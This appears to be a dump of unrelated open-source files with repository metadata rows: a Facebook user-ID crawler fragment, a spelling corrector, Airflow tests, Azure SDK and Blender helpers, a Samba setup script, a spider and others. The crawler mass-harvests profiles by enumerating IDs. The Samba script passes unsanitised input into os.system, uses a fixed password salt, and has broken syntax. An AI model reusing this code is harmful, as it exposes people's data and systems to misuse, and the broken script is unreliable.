port = int(mongoSettings[1].attributes['port'].value)
log = int(mongoSettings[2].attributes['log'].value)
fbTokenSettings = xmldoc.getElementsByTagName('fb')
token = fbTokenSettings[0].attributes['token'].value
if log == 1:
client = MongoClient(ipAddress, port)
db = client.facebookCrawler
users = db.users
userCount = 0
print "Starting crawl with privileges...Start: %s, End: %s" % (start, end)
for x in range(start, end):
try:
if x % 100 == 0:
print "Working...%s\n" % (x)
urlToVisit = secureBaseUrl + str(x) + '?access_token=' + str(token)
data = json.load(urllib2.urlopen(urlToVisit))
if log == 1:
users.insert(data)
userCount += 1
print data['name']
except:
pass
print "\n" + str(userCount) + " Results Found!"
print "Done crawling"
# Search for a user
def search(xmlFile, name):
xmldoc = minidom.parse('settings.xml')
crawlSettings = xmldoc.getElementsByTagName('fb')
token = crawlSettings[0].attributes['token'].value
name = name.replace(" ", "%20")
url = secureBaseUrl + 'search?q=' + str(name) + '&type=user&access_token=' + str(token)
count = 1
try:
data = json.load(urllib2.urlopen(url))
print "Search returned %s results" % len(data['data'])
for x in range(0, len(data['data'])):
print count, '-', data['data'][x]['name']
count = count + 1
except:
print "Error retrieving search results"
# See what metadata you can get from a User
def meta(xmlFile, username):
xmldoc = minidom.parse('settings.xml')
crawlSettings = xmldoc.getElementsByTagName('fb')
token = crawlSettings[0].attributes['token'].value
url = secureBaseUrl + str(username) + '?metadata=1&access_token=' + str(token)
count = 1
try:
data = json.load(urllib2.urlopen(url))
for k, v in data['metadata']['connections'].items():
print count, '-', k
count = count + 1
xmldata = dicttoxml(data)
with open(username + "_metadata.xml", 'w') as file_handle:
file_handle.write(xmldata)
except:
print "Error retrieving metadata\n"
# Crawl a specific user
def username(xmlFile, user):
xmldoc = minidom.parse('settings.xml')
crawlSettings = xmldoc.getElementsByTagName('fb')
token = crawlSettings[0].attributes['token'].value
url = secureBaseUrl + str(user) + '?access_token=' + str(token)
count = 1
try:
data = json.load(urllib2.urlopen(url))
xmldata = dicttoxml(data)
with open(user + ".xml", 'w') as file_handle:
file_handle.write(xmldata)
except:
print "Error retrieving user data\n"
| gpl-3.0 | -7,072,418,456,302,532,000 | 30.318471 | 91 | 0.605857 | false | 3.747713 | false | false | false |
adeshmukh/learntosolveit | languages/python/algorithm_spelling.py | 7 | 1031 | import re, collections
def words(text): return re.findall('[a-z]+', text.lower())
def train(features):
model = collections.defaultdict(lambda: 1)
for f in features:
model[f] += 1
return model
NWORDS = train(words(file('big.txt').read()))
alphabet = 'abcdefghijklmnopqrstuvwxyz'
def edits1(word):
splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]
deletes = [a + b[1:] for a, b in splits if b]
transposes = [a + b[1] + b[0] + b[2:] for a, b in splits if len(b)>1]
replaces = [a + c + b[1:] for a, b in splits for c in alphabet if b]
inserts = [a + c + b for a, b in splits for c in alphabet]
return set(deletes + transposes + replaces + inserts)
def known_edits2(word):
return set(e2 for e1 in edits1(word) for e2 in edits1(e1) if e2 in NWORDS)
def known(words): return set(w for w in words if w in NWORDS)
def correct(word):
candidates = known([word]) or known(edits1(word)) or known_edits2(word) or [word]
return max(candidates, key=NWORDS.get)
| bsd-3-clause | -3,281,640,367,960,298,000 | 33.366667 | 85 | 0.636275 | false | 2.971182 | false | false | false |
r39132/airflow | tests/contrib/operators/test_ecs_operator.py | 3 | 11098 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys
import unittest
from copy import deepcopy
from airflow import configuration
from airflow.exceptions import AirflowException
from airflow.contrib.operators.ecs_operator import ECSOperator
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
RESPONSE_WITHOUT_FAILURES = {
"failures": [],
"tasks": [
{
"containers": [
{
"containerArn":
"arn:aws:ecs:us-east-1:012345678910:container/e1ed7aac-d9b2-4315-8726-d2432bf11868",
"lastStatus": "PENDING",
"name": "wordpress",
"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55"
}
],
"desiredStatus": "RUNNING",
"lastStatus": "PENDING",
"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55",
"taskDefinitionArn": "arn:aws:ecs:us-east-1:012345678910:task-definition/hello_world:11"
}
]
}
class TestECSOperator(unittest.TestCase):
@mock.patch('airflow.contrib.operators.ecs_operator.AwsHook')
def setUp(self, aws_hook_mock):
configuration.load_test_config()
self.aws_hook_mock = aws_hook_mock
self.ecs = ECSOperator(
task_id='task',
task_definition='t',
cluster='c',
overrides={},
aws_conn_id=None,
region_name='eu-west-1',
group='group',
placement_constraints=[
{
'expression': 'attribute:ecs.instance-type =~ t2.*',
'type': 'memberOf'
}
],
network_configuration={
'awsvpcConfiguration': {
'securityGroups': ['sg-123abc']
}
}
)
def test_init(self):
self.assertEqual(self.ecs.region_name, 'eu-west-1')
self.assertEqual(self.ecs.task_definition, 't')
self.assertEqual(self.ecs.aws_conn_id, None)
self.assertEqual(self.ecs.cluster, 'c')
self.assertEqual(self.ecs.overrides, {})
self.assertEqual(self.ecs.hook, self.aws_hook_mock.return_value)
self.aws_hook_mock.assert_called_once_with(aws_conn_id=None)
def test_template_fields_overrides(self):
self.assertEqual(self.ecs.template_fields, ('overrides',))
@mock.patch.object(ECSOperator, '_wait_for_task_ended')
@mock.patch.object(ECSOperator, '_check_success_task')
def test_execute_without_failures(self, check_mock, wait_mock):
client_mock = self.aws_hook_mock.return_value.get_client_type.return_value
client_mock.run_task.return_value = RESPONSE_WITHOUT_FAILURES
self.ecs.execute(None)
self.aws_hook_mock.return_value.get_client_type.assert_called_once_with('ecs',
region_name='eu-west-1')
client_mock.run_task.assert_called_once_with(
cluster='c',
launchType='EC2',
overrides={},
startedBy=mock.ANY, # Can by 'airflow' or 'Airflow'
taskDefinition='t',
group='group',
placementConstraints=[
{
'expression': 'attribute:ecs.instance-type =~ t2.*',
'type': 'memberOf'
}
],
platformVersion='LATEST',
networkConfiguration={
'awsvpcConfiguration': {
'securityGroups': ['sg-123abc']
}
}
)
wait_mock.assert_called_once_with()
check_mock.assert_called_once_with()
self.assertEqual(self.ecs.arn,
'arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55')
def test_execute_with_failures(self):
client_mock = self.aws_hook_mock.return_value.get_client_type.return_value
resp_failures = deepcopy(RESPONSE_WITHOUT_FAILURES)
resp_failures['failures'].append('dummy error')
client_mock.run_task.return_value = resp_failures
with self.assertRaises(AirflowException):
self.ecs.execute(None)
self.aws_hook_mock.return_value.get_client_type.assert_called_once_with('ecs',
region_name='eu-west-1')
client_mock.run_task.assert_called_once_with(
cluster='c',
launchType='EC2',
overrides={},
startedBy=mock.ANY, # Can by 'airflow' or 'Airflow'
taskDefinition='t',
group='group',
placementConstraints=[
{
'expression': 'attribute:ecs.instance-type =~ t2.*',
'type': 'memberOf'
}
],
platformVersion='LATEST',
networkConfiguration={
'awsvpcConfiguration': {
'securityGroups': ['sg-123abc']
}
}
)
def test_wait_end_tasks(self):
client_mock = mock.Mock()
self.ecs.arn = 'arn'
self.ecs.client = client_mock
self.ecs._wait_for_task_ended()
client_mock.get_waiter.assert_called_once_with('tasks_stopped')
client_mock.get_waiter.return_value.wait.assert_called_once_with(
cluster='c', tasks=['arn'])
self.assertEqual(
sys.maxsize, client_mock.get_waiter.return_value.config.max_attempts)
def test_check_success_tasks_raises(self):
client_mock = mock.Mock()
self.ecs.arn = 'arn'
self.ecs.client = client_mock
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'foo',
'lastStatus': 'STOPPED',
'exitCode': 1
}]
}]
}
with self.assertRaises(Exception) as e:
self.ecs._check_success_task()
# Ordering of str(dict) is not guaranteed.
self.assertIn("This task is not in success state ", str(e.exception))
self.assertIn("'name': 'foo'", str(e.exception))
self.assertIn("'lastStatus': 'STOPPED'", str(e.exception))
self.assertIn("'exitCode': 1", str(e.exception))
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_check_success_tasks_raises_pending(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'container-name',
'lastStatus': 'PENDING'
}]
}]
}
with self.assertRaises(Exception) as e:
self.ecs._check_success_task()
# Ordering of str(dict) is not guaranteed.
self.assertIn("This task is still pending ", str(e.exception))
self.assertIn("'name': 'container-name'", str(e.exception))
self.assertIn("'lastStatus': 'PENDING'", str(e.exception))
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_check_success_tasks_raises_multiple(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'foo',
'exitCode': 1
}, {
'name': 'bar',
'lastStatus': 'STOPPED',
'exitCode': 0
}]
}]
}
self.ecs._check_success_task()
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_host_terminated_raises(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'stoppedReason': 'Host EC2 (instance i-1234567890abcdef) terminated.',
"containers": [
{
"containerArn": "arn:aws:ecs:us-east-1:012345678910:container/e1ed7aac-d9b2-4315-8726-d2432bf11868", # noqa: E501
"lastStatus": "RUNNING",
"name": "wordpress",
"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55" # noqa: E501
}
],
"desiredStatus": "STOPPED",
"lastStatus": "STOPPED",
"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55", # noqa: E501
"taskDefinitionArn": "arn:aws:ecs:us-east-1:012345678910:task-definition/hello_world:11" # noqa: E501
}]
}
with self.assertRaises(AirflowException) as e:
self.ecs._check_success_task()
self.assertIn(
"The task was stopped because the host instance terminated:",
str(e.exception))
self.assertIn("Host EC2 (", str(e.exception))
self.assertIn(") terminated", str(e.exception))
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_check_success_task_not_raises(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'container-name',
'lastStatus': 'STOPPED',
'exitCode': 0
}]
}]
}
self.ecs._check_success_task()
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -7,154,320,007,869,450,000 | 36.117057 | 138 | 0.545323 | false | 3.948061 | true | false | false |
zmarvel/playground | project3/merge.py | 1 | 1254 | def threeway_compare(x,y):
if x < y:
return -1
elif x == y:
return 0
else:
return 1
def merge(left, right, compare = threeway_compare):
result = []
i, j = 0, 0
while i < len(left) and j < len(right):
if compare(left[i], right[j]) <= 0:
result.append(left[i])
i += 1
else:
result.append(right[j])
j += 1
result += left[i:]
result += right[j:]
return result
def merge_sort(lst, compare = threeway_compare):
if len(lst) <= 1:
return lst
else:
middle = int(len(lst) / 2)
left = merge_sort(lst[:middle], compare)
right = merge_sort(lst[middle:], compare)
return merge(left, right, compare)
if __name__ == "__main__":
cmp = lambda x,y: -1 if x < y else (0 if x == y else 1)
assert merge_sort([], cmp) == []
assert merge_sort([1], cmp) == [1]
assert merge_sort([1,2], cmp) == [1,2]
assert merge_sort([2,1], cmp) == [1,2]
assert merge_sort([1,2,3]) == [1,2,3]
assert merge_sort([2,1,3], cmp) == [1,2,3]
assert merge_sort([3,2,1], cmp) == [1,2,3]
assert merge_sort([3,4,8,0,6,7,4,2,1,9,4,5]) == [0,1,2,3,4,4,4,5,6,7,8,9]
print('all tests passed!')
| mit | 8,966,986,141,526,539,000 | 28.857143 | 77 | 0.508772 | false | 2.811659 | false | false | false |
lmazuel/azure-sdk-for-python | azure-cognitiveservices-search-websearch/azure/cognitiveservices/search/websearch/models/videos.py | 2 | 3475 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .search_results_answer import SearchResultsAnswer
class Videos(SearchResultsAnswer):
"""Defines a video answer.
Variables are only populated by the server, and will be ignored when
sending a request.
:param _type: Constant filled by server.
:type _type: str
:ivar id: A String identifier.
:vartype id: str
:ivar web_search_url: The URL To Bing's search result for this item.
:vartype web_search_url: str
:ivar follow_up_queries:
:vartype follow_up_queries:
list[~azure.cognitiveservices.search.websearch.models.Query]
:ivar query_context:
:vartype query_context:
~azure.cognitiveservices.search.websearch.models.QueryContext
:ivar total_estimated_matches: The estimated number of webpages that are
relevant to the query. Use this number along with the count and offset
query parameters to page the results.
:vartype total_estimated_matches: long
:ivar is_family_friendly:
:vartype is_family_friendly: bool
:param value: A list of video objects that are relevant to the query.
:type value:
list[~azure.cognitiveservices.search.websearch.models.VideoObject]
:ivar next_offset:
:vartype next_offset: int
:ivar query_expansions:
:vartype query_expansions:
list[~azure.cognitiveservices.search.websearch.models.Query]
:ivar related_searches:
:vartype related_searches:
list[~azure.cognitiveservices.search.websearch.models.Query]
"""
_validation = {
'_type': {'required': True},
'id': {'readonly': True},
'web_search_url': {'readonly': True},
'follow_up_queries': {'readonly': True},
'query_context': {'readonly': True},
'total_estimated_matches': {'readonly': True},
'is_family_friendly': {'readonly': True},
'value': {'required': True},
'next_offset': {'readonly': True},
'query_expansions': {'readonly': True},
'related_searches': {'readonly': True},
}
_attribute_map = {
'_type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'follow_up_queries': {'key': 'followUpQueries', 'type': '[Query]'},
'query_context': {'key': 'queryContext', 'type': 'QueryContext'},
'total_estimated_matches': {'key': 'totalEstimatedMatches', 'type': 'long'},
'is_family_friendly': {'key': 'isFamilyFriendly', 'type': 'bool'},
'value': {'key': 'value', 'type': '[VideoObject]'},
'next_offset': {'key': 'nextOffset', 'type': 'int'},
'query_expansions': {'key': 'queryExpansions', 'type': '[Query]'},
'related_searches': {'key': 'relatedSearches', 'type': '[Query]'},
}
def __init__(self, value):
super(Videos, self).__init__()
self.value = value
self.next_offset = None
self.query_expansions = None
self.related_searches = None
self._type = 'Videos'
| mit | -4,605,479,205,483,070,500 | 39.406977 | 84 | 0.608058 | false | 3.908886 | false | false | false |
harag-on-steam/se-blender | src/python/space_engineers/texture_files.py | 1 | 5737 | from collections import namedtuple
from enum import Enum
from itertools import groupby
import os
import re
import bpy
_RE_DIFFUSE = re.compile(r"_[dm]e\.dds$", re.IGNORECASE)
_RE_NORMAL = re.compile(r"_ns\.dds$", re.IGNORECASE)
_RE_TEXTURE_TYPE = re.compile(
r"(?P<de>Diffuse_?(?P<me1>Masked_?)?(?:Emissiv(?:e|ity)?)?|DE|(?P<me2>ME))|"
r"(?P<ng>Normal_?Gloss(?:iness)?|NG)|" # needs to be before "Normal" due to non-optional suffix "Gloss"
r"(?P<ns>Normal_?(?:Specular(?:ity)?)?|NS)|"
r"(?P<cm>(?:(?:Base_?)?Color|Albedo)_?Metal(?:ness|ic)?|CM)|"
r"(?P<add>Add(?:_?Maps?|itional)?)|"
r"(?P<alphamask>Alpha(?:Mask)?)",
re.IGNORECASE
)
_RE_TEXTURE_LABEL = re.compile(
r"^(?:" + _RE_TEXTURE_TYPE.pattern + r")_?(?:(?P<alt>2|Alt)_?)?(?:Tex(?:ture)?)?(?:\.\d+)?$",
re.IGNORECASE)
_RE_TEXTURE_FILENAME = re.compile(
# basename is non-greedy so that the texture-type discriminator can be optional
r"^(?P<basename>.+?)_?(?:" + _RE_TEXTURE_TYPE.pattern + r")?\.(?P<extension>[^.]+)$",
re.IGNORECASE)
class TextureType(Enum):
# NameInParameterXml = 'file-suffix'
Diffuse = 'de'
Normal = 'ns'
ColorMetal = 'cm'
NormalGloss = 'ng'
AddMaps = 'add'
Alphamask = 'alphamask'
TextureFileName = namedtuple('TextureFileName', ('filepath', 'basename', 'textureType', 'extension'))
def _textureTypeFromMatch(match, alt=False) -> TextureType:
if match is None:
return None
for t in TextureType:
if match.group(t.value):
try:
if alt == bool(match.group('alt')):
return t
except IndexError:
return t # if there's no matching group 'alt' we already found our match
return None
def textureTypeFromLabel(label: str, alt=False) -> TextureType:
return _textureTypeFromMatch(_RE_TEXTURE_LABEL.match(label), alt=alt)
def textureTypeFromObjectName(obj, alt=False) -> TextureType:
textureType = textureTypeFromLabel(obj.name, alt=alt)
return textureType if textureType else textureTypeFromLabel(obj.label, alt=alt)
def imageNodes(nodes, alt=False):
"""
Extracts a map {TextureType -> bpy.types.ShaderNodeTexImage} from the given nodes.
The map will only contain keys for which there actually are texture-nodes.
The nodes do not necessarily have images, use imagesFromNodes() for that.
"""
pairs = ((textureTypeFromObjectName(img, alt=alt), img) for img in nodes if isinstance(img, bpy.types.ShaderNodeTexImage))
return {t : n for t, n in pairs if t}
def imagesFromNodes(nodes, alt=False):
"""
Extracts a map {TextureType -> bpy.types.Image} from the given nodes.
The map will only contain keys for which there actually are images.
"""
return {t : n.image for t, n in imageNodes(nodes, alt=alt).items() if n.image}
def textureFileNameFromPath(filepath: str) -> TextureFileName:
"""
Decomposes the filename of a given filepath into basename, textureType and extension.
The textureType might be None if it could not be determined.
The extension is None if the file doesn't have one.
basename and extension always are in lower-case recardless of the case in filepath.
"""
filename = os.path.basename(filepath)
match = _RE_TEXTURE_FILENAME.match(filename)
if not match:
return TextureFileName(filepath, filename.lower(), None, None)
return TextureFileName(
filepath = filepath,
basename = match.group('basename').lower(),
textureType = _textureTypeFromMatch(match),
extension = match.group('extension').lower(),
)
def textureFilesFromPath(dirpath: str, acceptedExtensions={'dds'}) -> dict:
"""
Builds a map of maps {basename -> {TextureType -> TextureFileName}} for all the files in the given directory.
Files for which no TextureType can be determined will not be included.
"""
try:
files = (textureFileNameFromPath(os.path.join(dirpath, f)) for f in os.listdir(dirpath))
except FileNotFoundError:
return {} # an image.filepath might not actually exist
files = filter(lambda f: f and f.textureType and f.extension in acceptedExtensions, files)
# for files with equal basename and equivalent texture-type this chooses the longest filename (as most descriptive)
files = sorted(files, key=lambda f: (f.basename, len(f.filepath)))
files = groupby(files, lambda f: f.basename)
files = {basename : {f.textureType : f for f in groupedFiles} for basename, groupedFiles in files}
return files
def imageFromFilePath(filepath):
"""
Provides a bpy.types.Image for the given filepath.
The function checks if there is an existing Image with such a filepath and loads a new one if there isn't.
"""
filepath = bpy.path.abspath(filepath)
for image in bpy.data.images:
if image.filepath and bpy.path.abspath(image.filepath) == filepath:
return image
try:
filepath = bpy.path.relpath(filepath)
except ValueError:
pass # .blend and image are on different drives, so fall back to using the absolute path
image = bpy.data.images.load(filepath)
return image
def matchingFileNamesFromFilePath(filepath):
"""
Provides a map {TextureType -> TextureFileName} for images that reside in the same directory as
the file given by filepath and that share the same basename.
"""
filepath = bpy.path.abspath(filepath)
textureFileName = textureFileNameFromPath(filepath)
if not textureFileName:
return {}
allFilesInDir = textureFilesFromPath(os.path.dirname(filepath))
matchingFiles = allFilesInDir.get(textureFileName.basename, None)
return matchingFiles if matchingFiles else {}
| gpl-2.0 | 4,081,149,205,319,464,000 | 40.273381 | 126 | 0.677532 | false | 3.68465 | false | false | false |
meigrafd/Sample-Code | sambaserver.py | 1 | 1194 | #!/usr/bin/python
import os
import sys
import crypt
a = raw_input("Enter No. Of user :")
def createuser (useradd1,passwd1):
epass = crypt.crypt(passwd1,"22")
return os.system(" useradd -p"+epass+ "-s" +"/bin/bash"+"-d"+"/home/"+useradd1+"-m"+"-c \"\"" +useradd1)
def sambaserver(user1):
f = raw_input ("Enter Directory name:")
net = raw_input("Enter Network :")
sb = raw_input("Enter you samba share name :")
os.system('sudo apt-get install samba samba-common-bin -y')
os.system("mkdir %s"%f )
os.system("chcon -t samba_share_t %s "%f)
os.system('echo [%s] >> /etc/samba/smb.conf'%sb)
os.system('echo comment = public >> /etc/samba/smb.conf')
os.system('echo path = %s >> /etc/samba/smb.conf'%f)
os.system('echo public = yes >> /etc/samba/smb.conf')
os.system('echo browsable = yes >> /etc/samba/smb.conf')
os.system("echo valid users = %s >> /etc/samba/smb.conf"%user1)
os.system("echo host allow = %s >> /etc/samba/smb.conf"%net)
os.system("smbpasswd -a %s"%user1)
os.system('sudo service samba restart')
for x in range(a)
useradd = raw_input("Enter User name :")
passwd = raw_input("Enter password :")
createuser(useradd,passwd)
sambaserver(useradd)
| mit | 6,200,398,064,977,913,000 | 35.181818 | 112 | 0.656616 | false | 2.732265 | false | false | false |
nooperpudd/pulsar | tests/utils/structures/zset.py | 7 | 2912 | import unittest
from random import randint
from pulsar.utils.structures import Zset
from pulsar.apps.test import populate
class TestZset(unittest.TestCase):
zset = Zset
def random(self):
string = populate('string', size=100)
values = populate('float', size=100, min=-10, max=10)
s = self.zset()
s.update(zip(values, string))
return s
def test_add(self):
s = self.zset()
s.add(3, 'ciao')
s.add(4, 'bla')
self.assertEqual(len(s), 2)
s.add(-1, 'bla')
self.assertEqual(len(s), 2)
data = list(s)
self.assertEqual(data, ['bla', 'ciao'])
def test_rank(self):
s = self.zset()
s.add(3, 'ciao')
s.add(4, 'bla')
s.add(2, 'foo')
s.add(20, 'pippo')
s.add(-1, 'bla')
self.assertEqual(len(s), 4)
self.assertEqual(s.rank('bla'), 0)
self.assertEqual(s.rank('foo'), 1)
self.assertEqual(s.rank('ciao'), 2)
self.assertEqual(s.rank('pippo'), 3)
self.assertEqual(s.rank('xxxx'), None)
def test_update(self):
s = self.random()
self.assertTrue(s)
prev = None
for score, _ in s.items():
if prev is not None:
self.assertTrue(score >= prev)
prev = score
return s
def test_remove(self):
s = self.test_update()
values = list(s)
while values:
index = randint(0, len(values)-1)
val = values.pop(index)
self.assertTrue(val in s)
self.assertNotEqual(s.remove(val), None)
self.assertFalse(val in s)
self.assertFalse(s)
def test_remove_same_score(self):
s = self.zset([(3, 'bla'), (3, 'foo'), (3, 'pippo')])
self.assertEqual(s.remove('foo'), 3)
self.assertEqual(len(s), 2)
self.assertFalse('foo' in s)
def test_range(self):
s = self.random()
values = list(s.range(3, 10))
self.assertTrue(values)
self.assertEqual(len(values), 7)
all = list(s)[3:10]
self.assertEqual(all, values)
def test_range_scores(self):
s = self.random()
values = list(s.range(3, 10, True))
self.assertTrue(values)
self.assertEqual(len(values), 7)
all = list(s)[3:10]
all2 = [v for _, v in values]
self.assertEqual(all, all2)
def test_remove_range_by_score(self):
s = self.zset([(1.2, 'bla'), (2.3, 'foo'), (3.6, 'pippo')])
self.assertEqual(s.remove_range_by_score(1.6, 4), 2)
self.assertEqual(s, self.zset([(1.2, 'bla')]))
def test_remove_range_by_rank(self):
s = self.zset([(1.2, 'bla'), (2.3, 'foo'), (3.6, 'pippo'),
(4, 'b'), (5, 'c')])
self.assertEqual(s.remove_range(1, 4), 3)
self.assertEqual(s, self.zset([(1.2, 'bla'), (5, 'c')]))
| bsd-3-clause | 6,606,941,366,797,245,000 | 29.652632 | 67 | 0.525755 | false | 3.235556 | true | false | false |
PumpkinPai/lslvimazing-builder | spidey.py | 1 | 4506 | #!/usr/bin/python3
# go to 'targeturl' looking for 'searchterm' and return all of the values within
# 'delim' immediately following the beginning of 'searchterm'
import urllib.request
import os
# Crawl url, look for searchTerm, grab thing within delim, put it in txtFile
def crawl(url, pageBegin, pageEnd, searchTerm, delim, squash, txtFile):
# temp- we now have decent files to play with
# return ('x', 'x')
multi = True
multiQuery = ''
# clear text file
try:
os.remove(txtFile)
except: pass
pageCount = 0
findCount = 0
try:
while multi:
pageCount += 1
print('Going to: ' + url+multiQuery)
response = urllib.request.urlopen(url+multiQuery)
html = str(response.read())
#print('ERR:' + html[0:10])
#if tolower(html[0:9]) == "http error":
# print('Error getting page:' + html[0:15])
# exit()
# PAGEBEGIN TO PAGEEND
# Make it just the sweet nectar within pageBegin and pageEnd
startHtml = html.find(pageBegin)
endHtml = html.find(pageEnd)
html = html[startHtml:endHtml]
# SQUASH
# remove problematic tags and strings
if squash:
for squish in squash:
html = html.replace(squish, '')
# MULTI
# If the category spans multiple pages, cry
multi = html.find('pagefrom=')
# we need this link for the next time around
startMulti = html.find('=', multi) + 1
endMulti = html.find('"', startMulti + 1)
multiQuery = html[startMulti:endMulti]
if multi > 0: multi = True
else: multi = False
# PROCESS HTML and save
foundList = []
saveFile = open(txtFile, 'a')
while True:
startFind = html.find(searchTerm) + len(searchTerm)
startFound = html.find(delim[0], startFind)
endFound = html.find(delim[1], startFound + 1)
found = html[startFound + 1 : endFound]
html = html[endFound:]
if found:
findCount += 1
foundList.append(found)
else:
foundTxt = '\n'.join(foundList) + '\n'
saveFile.write(foundTxt)
saveFile.close
break
return (str(findCount), str(pageCount))
except Exception as e:
print(str(e))
return (0, 0)
def cleanResults(dirtyFilename, specialRules, replace, ignoreList):
try:
readFile = open(dirtyFilename, 'r')
except Exception as e:
print(str(e))
return
resultList = []
for line in readFile:
resultList.append(line.strip('\n'))
# Round 1 for specialRules
cleanList = []
for rule in specialRules:
# print(rule) # debug
for txt in resultList:
if rule == 'caps':
txt = txt.upper()
elif rule == 'lower':
txt = txt.lower()
elif rule == 'firstLower':
txt = txt[0].lower() + txt[1:]
cleanList.append(txt)
# Round 2, replicants and ignorables
if cleanList[1]:
resultList = cleanList
cleanList = []
for txt in resultList:
# Assume they took a bath
dirty = ''
if txt in cleanList:
# She's a replicant
print(str(cleanList.index(txt)) + ' : ' + txt)
dirty = ' a replicant'
if txt.lower() in ignoreList:
dirty = ' in the ignoreList'
if dirty == '':
cleanList.append(txt)
else:
pass
# print('Removed: ' + txt + ' because it was' + dirty)
# Round 3, replacements
if cleanList[1]:
resultList = cleanList
if replace[0]:
cleanList = []
for txt in resultList:
txt = txt.replace(replace[0], replace[1])
cleanList.append(txt)
readFile.close
resultTxt = '\n'.join(cleanList) + '\n'
writeFile = open(dirtyFilename, 'w')
writeFile.write(resultTxt)
writeFile.close
# return number, first and last
return (str(len(resultList)), cleanList[0], cleanList[-1])
if __name__ == "__main__":
print('The main file is "buildit.py" Run that instead.')
| gpl-2.0 | 4,063,359,969,481,211,000 | 30.075862 | 81 | 0.524634 | false | 4.044883 | false | false | false |
wakatime/komodo-wakatime | components/wakatime/dependencies/__init__.py | 2 | 4336 | # -*- coding: utf-8 -*-
"""
wakatime.dependencies
~~~~~~~~~~~~~~~~~~~~~
Parse dependencies from a source code file.
:copyright: (c) 2014 Alan Hamlett.
:license: BSD, see LICENSE for more details.
"""
import logging
import re
import sys
from ..compat import u, open, import_module
from ..exceptions import NotYetImplemented
log = logging.getLogger('WakaTime')
class TokenParser(object):
"""The base class for all dependency parsers. To add support for your
language, inherit from this class and implement the :meth:`parse` method
to return a list of dependency strings.
"""
exclude = []
def __init__(self, source_file, lexer=None):
self._tokens = None
self.dependencies = []
self.source_file = source_file
self.lexer = lexer
self.exclude = [re.compile(x, re.IGNORECASE) for x in self.exclude]
@property
def tokens(self):
if self._tokens is None:
self._tokens = self._extract_tokens()
return self._tokens
def parse(self, tokens=[]):
""" Should return a list of dependencies.
"""
raise NotYetImplemented()
def append(self, dep, truncate=False, separator=None, truncate_to=None,
strip_whitespace=True):
self._save_dependency(
dep,
truncate=truncate,
truncate_to=truncate_to,
separator=separator,
strip_whitespace=strip_whitespace,
)
def partial(self, token):
return u(token).split('.')[-1]
def _extract_tokens(self):
if self.lexer:
try:
with open(self.source_file, 'r', encoding='utf-8') as fh:
return self.lexer.get_tokens_unprocessed(fh.read(512000))
except:
pass
try:
with open(self.source_file, 'r', encoding=sys.getfilesystemencoding()) as fh:
return self.lexer.get_tokens_unprocessed(fh.read(512000)) # pragma: nocover
except:
pass
return []
def _save_dependency(self, dep, truncate=False, separator=None,
truncate_to=None, strip_whitespace=True):
if truncate:
if separator is None:
separator = u('.')
separator = u(separator)
dep = dep.split(separator)
if truncate_to is None or truncate_to < 1:
truncate_to = 1
if truncate_to > len(dep):
truncate_to = len(dep)
dep = dep[0] if len(dep) == 1 else separator.join(dep[:truncate_to])
if strip_whitespace:
dep = dep.strip()
if dep and (not separator or not dep.startswith(separator)):
should_exclude = False
for compiled in self.exclude:
if compiled.search(dep):
should_exclude = True
break
if not should_exclude:
self.dependencies.append(dep)
class DependencyParser(object):
source_file = None
lexer = None
parser = None
def __init__(self, source_file, lexer):
self.source_file = source_file
self.lexer = lexer
if self.lexer:
module_name = self.root_lexer.__module__.rsplit('.', 1)[-1]
class_name = self.root_lexer.__class__.__name__.replace('Lexer', 'Parser', 1)
else:
module_name = 'unknown'
class_name = 'UnknownParser'
try:
module = import_module('.%s' % module_name, package=__package__)
try:
self.parser = getattr(module, class_name)
except AttributeError:
log.debug('Parsing dependencies not supported for {0}.{1}'.format(module_name, class_name))
except ImportError:
log.debug('Parsing dependencies not supported for {0}.{1}'.format(module_name, class_name))
@property
def root_lexer(self):
if hasattr(self.lexer, 'root_lexer'):
return self.lexer.root_lexer
